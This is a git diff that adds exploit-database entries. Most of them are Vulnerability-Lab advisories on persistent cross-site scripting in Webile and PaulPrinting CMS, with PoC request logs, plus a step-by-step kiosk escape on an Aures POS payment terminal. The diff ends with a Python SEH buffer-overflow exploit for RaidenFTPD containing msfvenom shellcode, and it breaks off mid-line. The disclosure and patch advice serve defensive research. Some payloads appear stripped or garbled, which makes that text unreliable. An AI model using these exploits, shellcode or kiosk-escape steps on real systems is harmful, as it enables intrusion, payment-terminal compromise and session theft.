+
+
<[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]>
+
<[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]>
+
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.
+Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability in the application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
\ No newline at end of file
diff --git a/exploits/php/webapps/51616.txt b/exploits/php/webapps/51616.txt
new file mode 100644
index 000000000..60ac9527d
--- /dev/null
+++ b/exploits/php/webapps/51616.txt
@@ -0,0 +1,240 @@
+Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2321
+
+
+Release Date:
+=============
+2023-07-03
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2321
+
+
+Common Vulnerability Scoring System:
+====================================
+5.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server in
+the local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,
+statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and other
+functions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,
+Windows, Linux, iOS, Android and other multi-platform operating systems.
+
+(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.
+
+Affected Product(s):
+====================
+Product Owner: Webile
+Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-10-11: Researcher Notification & Coordination (Security Researcher)
+2022-10-12: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-03: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own malicious
+script codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
+source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] new_file_name
+[+] i
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.
+For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
+
+
+Vulnerable Source: Send
+Send message to phone listing
+
+history logs messages
+
+
+
+
+--- PoC Session Logs #1 (POST) --- (Add)
+http://localhost:8080/file_action
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 210
+Origin:http://localhost:8080
+Connection: keep-alive
+Referer:http://localhost:8080/webile_files
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"
"}
+-
+POST: HTTP/1.1 200 OK
+Content-Type: application/json
+Connection: keep-alive
+Content-Encoding: gzip
+Transfer-Encoding: chunked
+-
+http://localhost:8080/evil.source
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8080/webile_files
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Connection: keep-alive
+Content-Length: 0
+-
+Cookie:
+treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+
+
+
+--- PoC Session Logs #2 (POST) --- (Send)
+http://localhost:8080/send
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 180
+Origin:http://localhost:8080
+Connection: keep-alive
+Referer:http://localhost:8080/webile_send
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"
"}
+-
+POST: HTTP/1.1 200 OK
+Content-Type: application/json
+Connection: keep-alive
+Content-Encoding: gzip
+Transfer-Encoding: chunked
+-
+http://localhost:8080/evil.source
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:http://localhost:8080/webile_send
+Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Content-Type: application/octet-stream
+Date: Sun, 17 Jul 2022 18:08:33 GMT
+Connection: keep-alive
+Content-Length: 0
+
+
+Security Risk:
+==============
+The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
\ No newline at end of file
diff --git a/exploits/php/webapps/51617.txt b/exploits/php/webapps/51617.txt
new file mode 100644
index 000000000..193bbaa8a
--- /dev/null
+++ b/exploits/php/webapps/51617.txt
@@ -0,0 +1,185 @@
+Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2323
+
+
+Release Date:
+=============
+2023-07-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2323
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Vulnerability Class:
+====================
+Privilege Escalation
+
+
+Current Estimated Price:
+========================
+3.000€ - 4.000€
+
+
+Product & Service Introduction:
+===============================
+KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or
+freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk
+features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.
+With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to
+manage customer cards and promotions. Queue management can also be optimized.
+
+(Copy of the Homepage:https://aures.com/de/komet/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of
+the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.
+
+
+Affected Product(s):
+====================
+Aures Technologies GmbH
+Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2023-05-09: Researcher Notification & Coordination (Security Researcher)
+2023-07-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Open Authentication (Anonymous Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal
+(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers
+to bypass the kiosk mode to compromise the local file system and applications.
+
+It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are
+able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security
+vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local
+privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate
+local file-system information of the compromised windows based operating system.
+
+No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system
+vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.
+
+Vulnerable Operating System(s):
+[+] Windows 10 (IoT Enterprise)
+
+Affected Component(s):
+[+] Context Menu
+
+Affected Function(s):
+[+] Web Search
+[+] Share (Teilen)
+
+
+Proof of Concept (PoC):
+=======================
+The local vulnerability can be exploited by local attackers with physical device access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Sheet
+Touch Display => Select Food Item => Highlight Text
+=> Open Context Menu => Extend Context Menu => Web-Search
+=> Browser => Local File System => Compromised!
+
+
+Manual steps to reproduce the vulnerability ...
+01. First touch the monitor display to move on from standby
+02. Select an food item from the menu of immergrün (we recomment the cesar wraps)
+03. Push the information button of the selected food item
+04. Push twice via touch to mark the selected food item text
+05. Press a third time after you have marked the context by holding it down on the touch display
+06. Now the function context menu of the operating system for highlighted text appears
+07. On the context menu appearing 3 dots to extend the visible function menu
+08. Select the web-search or share function for the highlighted content in the context menu
+09. The browser of the operating system opens on the main front screen
+10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)
+10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)
+10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)
+10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)
+10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
+10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols
+10.7 Attackers are able to perform man in the middle attacks from the local computer system
+11.0 Successful reproduce of the security vulnerability!
+
+
+Reference(s): Pictures
+- 1.png (Terminal A)
+- 2.png (Terminal B)
+- 3.png (Escape)
+- 4.png (Awareness)
+
+
+Solution - Fix & Patch:
+=======================
+The security vulnerabilities can be patched by following steps:
+1. Disable the content menu to extend
+2. Disable the context menu
+3. Disable web-search
+4. Disable to mark text inputs & texts
+5. Disallow to open not white listed websites
+6. Disable to download files
+7. Restrict the web-browser access
+8. Disallow the file browser
+9. Disable the browser debug modus
+10. Reconfigure the local firewall to allow and disallow connections
+11. Change the access permission to prevent exfiltration
+
+
+Security Risk:
+==============
+The security risk of the vulnerability in the local booking and payment terminal system is considered high.
+The issue can be easily exploited by local attackers with simple interaction via the touch display.
+Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse
+it for further simple or more complex attack scenarios.
+
+
+Credits & Authors:
+==================
+Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
+Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther
\ No newline at end of file
diff --git a/exploits/php/webapps/51618.txt b/exploits/php/webapps/51618.txt
new file mode 100644
index 000000000..da965a8b1
--- /dev/null
+++ b/exploits/php/webapps/51618.txt
@@ -0,0 +1,257 @@
+Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2285
+
+
+Release Date:
+=============
+2023-07-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2285
+
+
+Common Vulnerability Scoring System:
+====================================
+5.8
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
+
+(Copy of the Homepage:https://codecanyon.net/user/codepaul )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.
+
+
+Affected Product(s):
+====================
+CodePaul
+Product: PaulPrinting (2018) - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2022-08-25: Researcher Notification & Coordination (Security Researcher)
+2022-08-26: Vendor Notification (Security Department)
+2022-**-**: Vendor Response/Feedback (Security Department)
+2022-**-**: Vendor Fix/Patch (Service Developer Team)
+2022-**-**: Security Acknowledgements (Security Department)
+2023-07-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (User Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Responsible Disclosure
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.
+The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.
+After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins
+in the backend (listing).
+
+The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own
+malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in
+the backend (listing).
+
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] /printing/register
+[+] /account/delivery
+
+Vulnerable Input(s):
+[+] First name
+[+] Last name
+[+] Address
+[+] City
+[+] State
+
+Vulnerable Parameter(s):
+[+] firstname
+[+] lastname
+[+] address
+[+] city
+[+] state
+
+Affected Module(s):
+[+] Frontend Settings (./printing/account/setting)
+[+] Frontend Delivery Address (./printing/account/delivery)
+[+] Backend User Preview Listing
+[+] Backend Delivery Address Contact Review
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open your browser and start a http session tamper
+2. Register in the application by login click to register
+3. Inject to the marked vulnerable input fields your test payload
+4. Save the entry by submit via post method
+5. Login to the account and preview the settings
+Note: Administrators in the backend have the same wrong validated context that executes on preview of users
+6. The script code executes on preview of the profile - settings
+7. Successful reproduce of the first vulnerability!
+8. Followup by opening the Delivery address module
+9. Add a contact and add in the same vulnerable marked input fields your test payload
+Note: T he script code executes on each review of the address in the backend or user frontend
+10. Successful reproduce of the second vulnerability!
+
+
+Exploitation: Payload
+"
+
+
+Security Risk:
+==============
+The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
\ No newline at end of file
diff --git a/exploits/windows/local/51611.py b/exploits/windows/local/51611.py
new file mode 100755
index 000000000..3cb927419
--- /dev/null
+++ b/exploits/windows/local/51611.py
@@ -0,0 +1,59 @@
+# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
+# Date: 18/07/2023
+# Exploit Author: Andre Nogueira
+# Vendor Homepage: https://www.raidenftpd.com/en/
+# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
+# Version: RaidenFTPD 2.4.4005
+# Tested on: Microsoft Windows 10 Build 19045
+
+# 1.- Open RaidenFTPD
+# 2.- Click on 'Setup' -> 'Step by step setup wizard'
+# 3.- Run python code: exploit-raidenftpd.py
+# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
+# 5.- Click 'next' -> 'next' -> 'ok'
+# 6.- Pop calc.exe
+
+
+#!/usr/bin/env python3
+from struct import pack
+
+crash = 2000
+offset = 497
+
+# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d"
+shellcode = b"\x90" * 8
+shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"
+shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"
+shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"
+shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"
+shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"
+shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"
+shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"
+shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"
+shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"
+shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"
+shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"
+shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"
+shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"
+shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"
+shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"
+shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"
+shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"
+shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"
+shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"
+shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"
+
+nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytes
+SEH = pack("